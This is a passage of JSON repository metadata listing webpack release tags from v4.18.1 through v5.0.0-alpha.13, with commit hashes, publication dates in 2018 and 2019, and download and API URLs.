"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecos